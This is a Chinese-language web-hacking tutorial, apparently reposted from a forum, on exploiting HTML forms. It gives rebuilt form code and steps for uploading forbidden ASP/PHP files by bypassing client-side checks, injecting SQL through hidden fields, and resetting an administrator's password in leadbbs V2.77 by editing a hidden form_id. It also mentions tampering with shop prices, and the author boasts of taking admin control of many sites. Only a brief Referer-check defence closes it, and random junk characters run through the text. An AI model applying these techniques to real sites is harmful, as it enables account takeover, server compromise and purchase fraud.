在Web程序设计中,处理表单提交的数据是客户端向SERVER传递数据的主要方法,表单数据的提交方法有两种Post方法和Get方法,当使用Post方法时,数据由标准的
8 W; L7 d1 Y1 V: T0 t输入设备读入,当使用Get方法时,数据由CGI变量QUERY_STRING传递给表单数据处理程序,当Post方法一般不会在服务器上留下痕迹。具体的实现过程这里我就不多说,) M9 v7 E8 V5 O
有兴趣的朋友可以去翻阅其他资料。不管是ASP程序还是PHP,CGI程序,表单提交的作用的大同小异的,所以这里仅以ASP为例。
( |( Z0 N: B; n7 N) Z
0 i1 B6 s' y( j: P: v 一.利用表单本地提交突破入侵限制
& R9 e+ u s% D5 R& ]. M: ?8 d 既然表单是客户端与服务端的重要数据传递方法之一,那么它的安全性就难免会出现问题。
% @& a2 T* L2 L
' h8 b0 ]* ~" N1 O$ |1:上传非法文件。. u7 K% {/ Y; H( s/ @6 H5 T
" F! @0 ]$ n$ u; k! v3 z
某同学录的popwindowupload1.asp的客户端代码如下:( e& S |: a- q9 N5 |+ q. S
+ z Q! D( K! r# U: A1 |
< HTML> .... < Script language="javascript"> function mysubmit(theform) { if(theform.big.value=="") { alert("请点击浏览按钮,选择您要上传的jpg或gif文件!") theform.big.focus; return (false); } else { str= theform.big.value; strs=str.toLowerCase(); lens=strs.length; extname=strs.substring(lens-4,lens); if(extname!=".jpg" && extname!=".gif") { alert("请选择jpg或gif文件!"); return (false); } } return (true); } < /script> ..... < input type="hidden" name="act" value="upload"> < input type="hidden" name="filepath" value="/alumni/class/classimage"> < input type="submit" name="Submit2" value="开始上传"> .... < /HTML>$ O0 W' C! {; `0 E. n2 T" Y
5 j9 U" y A" }$ R- w6 G7 [. Q0 B, n
很明显,这个上传文件在客户端利用SCRIPT限制了上传类型,虽然用SCRIPT可以减轻ASP程序的负载,但象大部分好的方面一样也有它坏的一面,如果其只是在客户端做限制,并在服务端限制上传类型或禁止外部提交,那么它并不能阻止我们上传程序禁止上传的ASP,CER,PHP等文件,只要我们在本地构造一个表单也能能轻松的上传这些文件。3 y8 m! H- o# @5 K
5 I7 ^; \) V# q% G; D" ^# {1 [ 构造的表单主要代码如下:( S, d/ ~- i, p1 T5 F
.............
% x: l3 B+ }1 [+ k
0 `& H4 M8 g, Q/ _, J! o8 G) B< form name="mainForm" enctype="multipart/form-data" action="http://www.*** w.com/alumni/class/pic/upfile.asp?userid2=" method=post"> < tr> < td width="74" align="right" height="26">标题: < td width="399">十二少 < /tr> < tr> < td width="74" align="right" height="26">照片说明: < td width="399">十二少's照片 < /td> < /tr> < tr> < td width="74" align="right" height="26">图片路径: < td width="399"> < input type="file" name="big"> < /td> < /tr> < tr align="center"> < td colspan="2" height="26"> < input type="hidden" name="act" value="upload"> < input type="hidden" name="filepath" value="/alumni/class/classimage"> < input type="submit" name="Submit2" value="开始上传"> < br> < /td> < /tr> < tr align="center"> < td colspan="2" height="26" class="di">只支持jpg,gif文件,图片大小在 150k< /font>以内,上传时请耐心等待! < /tr> < /form>% g3 }9 l: W* B5 q! }
9 X/ m. N: O$ a- n ....
$ y- l9 p. e0 C2 C% j. o: `: r" A/ { 只要将前面查看得到的代码中的验证文件类型的SCRIPT删掉,然后再修改ACTION后的URL保存为HTML文件即可9 C" i7 @; t! E& Q- \
( S( S; @# ~% s+ a( c3 B3 x 2:突破表格注入限制
. ~- L& \: |, x. {3 s* R 这个和前面一差不多就不再多说了(呵呵,其实是找不到实例拉)4 W$ k+ A$ W( A/ ^
另外字符输入的长度限制也差不多,只要你看得懂这些HTML语言。
8 O* i9 R: b1 X# H5 ] 二.HIDDEN隐藏字段缺陷5 y' o2 F! K; Z' ^
终于说到重点了。 2 l3 _5 ?- o5 G; e6 y- L8 A ^4 N
1:还是SQL注入问题。
. B& J( e3 ?' S: O; V& @& F 目前SQL注入工击仍是入侵中的一大热点,不过随着时间的推移,一般的大型网站程序都已经将明显的
! N- t5 R# g: ?/ j0 ? 注入点打好补丁拉,但是一些隐藏的比较深的注入点却还是有不少的,除非将它所有的代码都翻新一片。8 ]3 ?0 _. j6 w: M7 a7 d: L% `3 u0 D
明显的注入点如:.asp?id=*,输入框等都已经过滤了,但这就能彻底的杜绝黑客的入侵吗?回答当然是NO
& {! L. M5 l0 [3 j 这就要提到本文的重点HIDDEN隐藏字段拉。( M/ k Z' d; P* z. x
图1是某网游官方站点的帐号激活界面,查看源码,搜索"HIDDEN"字符串) [( l* [- J; r1 z& o' e, `7 d
7 \% v$ y1 h5 d: a2 O; q- j
2 P3 m4 [" W5 x0 O
< form action="index_game.asp" method="post" name="form1" target="_blank" > ... < td height="25" align="center"> < input type="submit" name="Submit" value="提交"> ... < /form>4 A. f$ }3 N8 l% P, K2 K8 r% p- I
+ Y$ \$ M" k# v* o* k9 V8 N
/ r% v9 T. o; m1 C) Y% t
如图2,看到了吗那个:; R# q# @: p, L$ m" `/ u. l0 v
只要它没有在客户端做任何限制,
* U8 D1 ?, b% C# O 这就是一个注入点拉,将"user_name"的值"norfolk"改为想要注入的代码,然后和前面的一样将"ACTION"
; }7 x% W8 q" ] X) J, F+ l6 } 的改为相应的URL,保存为HTML文件~~~~~~~~~
5 J& q3 a6 M4 _; x5 \ 不过,它的安全还不错,提交后返回错误提示窗口,很显然它在服务端禁止了外部提交。 t! o$ _5 d3 O3 n3 |" a; v" d2 T
2:非法修改其他用户密码。
8 U) d4 D% Q2 z' S
; `1 J M+ i/ r, C& a 典型的代表是leadbbs V2.77的那个密码修改漏洞:任何注册用户都可以修改管理员密码,从而入侵服务器,
7 ^" I: H7 ?! }' e) ]# X进而拿下主机。, u+ z" z8 ?) k8 D* }
登陆后修改密码,查看源码,其主要漏洞代码如下:
' {7 V' r; ~0 X+ g1 X.......
- Y" F" p1 [9 h7 C x! R: E7 M: \) v) G/ b
. X; b+ P* q2 W& }< form action=usermodify.asp method=post name=form1 > < tr> < td align=middle height=25> < p>*用户名称: < td height=25> < p>norfolk < tr> < td align=middle height=25> < p>*你的密码: < td height=25> < input class=fminpt name=submitflag type=hidden value=52norflk> < input class=fminpt name=form_id type=hidden value=265>) Y8 o4 i8 Y l$ B( y9 ]
3 y$ _ d0 W( a+ ^+ R1 s! d
* ^ Q3 J! ]! S; X2 G9 `........ 5 q' H9 N2 Z' L+ }1 C) ]
! K: I! `# q$ H7 M% J5 `2 P其中我的from_id的值为265,在管理员例表中查看管理员ID,然后将它替换265,再将ACTION的URL相应的修改一下
* H' E* g" ]- u, T* ]* T* v保存为HTML文件再提交就可以将管理员的密码改成52norfolk。
1 V% d! r8 l6 ~: U: w
; p! \6 A/ B: _" a' p' L 这个漏洞早在2003.12月就已经公布,这里在拿出来只是为了说明一下这个HIDDEN隐藏字段的危害。不过我发现目前
3 i- F, r7 D. I& U2 R$ w4 Z还是有不少程序可以任意修改其他用户的密码,至于方法如出一辙,(偶用这个漏洞拿下过不少站点的ADMIN):-_-1 w: J% q: R) n G
% y, O$ o3 j# } o. T) Y
3:任意修改价格以达到低价甚至不花一分钱网上购物。/ x, ~' v* G) P$ I% |
' I# y- s+ c" l) `$ u
早在几年前国内国外的一些大型网上购物网站就已经出现过类似的漏洞。 这些网站的后台程序的验证机制并不健全; n0 T( u+ P/ i' Q3 |$ }; S
以至可以在外部提交数据,于是便出现了低价甚至不花一分钱购买商品的事件,导致这些网站造成重大的经济损失,
0 m: M8 U1 a/ C: p# T$ d由此观之,网络安全是马虎不得的,即使一丁点而问题,造成的损失也是不可估量的。希望之后的程序员在编写程序时能) Y) L" p- q/ T
够尽量细心。这里我就不再将它的利用过程写出来了,反正它们的利用过程都基本相似。0 T: l) Z2 y( l4 G5 ^$ X* r
; [5 z6 b0 V: U. l( _2 `
最后给大家介绍老外写的一个不错的检测WEB应用程序安全性的工具,一下是安全焦点的介绍:
! S5 M7 K! |( g; B; [7 H
, ~+ x- v0 b; ~/ Y& K, u Achilles是一个设计用来测试web应用程序安全性的工具。它是一个代理服务器,在一' V5 `/ h N5 v
个HTTP会话中扮演着"中间人"(man-in-the-middle)的角色。一个典型的HTTP代理服
% y0 D9 L: V% m G& f) t 务器将在客户浏览器和web服务器间转发数据包,但Achilles却载取发向任一方的HTTP会
1 `. o- H+ ^9 O- X8 M+ y; W. Y 话数据,并且在转发数据前可以让用户修改这些数据.( _3 e0 M3 {, f; H# q6 z0 U
- `3 _3 p% n1 V3 i2 h" y
相信在WEB入侵方面可以为您提供不少的帮助,如果有可能下次再专门写篇文章介绍它吧,这里我就不多说了,有兴趣的
7 V# y3 u1 b. g; R2 v9 X, Q 朋友可以自己下载研究研究,它的下载地址:http://www.xfocus.net/tools/200403/achilles-0-27.zip
# B- O; [3 a. k# z- r8 r $ p. P, B9 A; l) t. d O5 K
' |' r- ]$ E! H4 X) x 后记:6 f6 v+ n: j3 _8 L% [% J. q
到这里还是说一下解决方法吧。) L7 i' |( C. d7 P; Y; d$ ]
首先当然是禁止外部提交,这里有种不错的方法,大家可以参考参考:. P! u* I5 Q/ d9 r1 F$ r3 R
+ r2 [+ n) z4 X. u
: ^& e3 Q8 }. e [8 B< % server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")) server_v2=Cstr(Request.ServerVariables("SERVER_NAME")) if mid(server_v1,8,len(server_v2))<>server_v2 then % > 你想入侵我也不要这么麻烦嘛,直接打电话告诉我,我给你开WEBSHELL,呵呵 < % Response.Redirect "Fuck-Hacker.asp" end if % >) |% S. U9 | u" e
: s! O1 B0 ~/ |, d3 {
5 @& B0 Z: |7 N 但这不能彻底杜绝黑客对传递的DIDDEN数据的修改,前面那个ACHILLES就能修改,所以在服务端还要有健全的验证机制。 |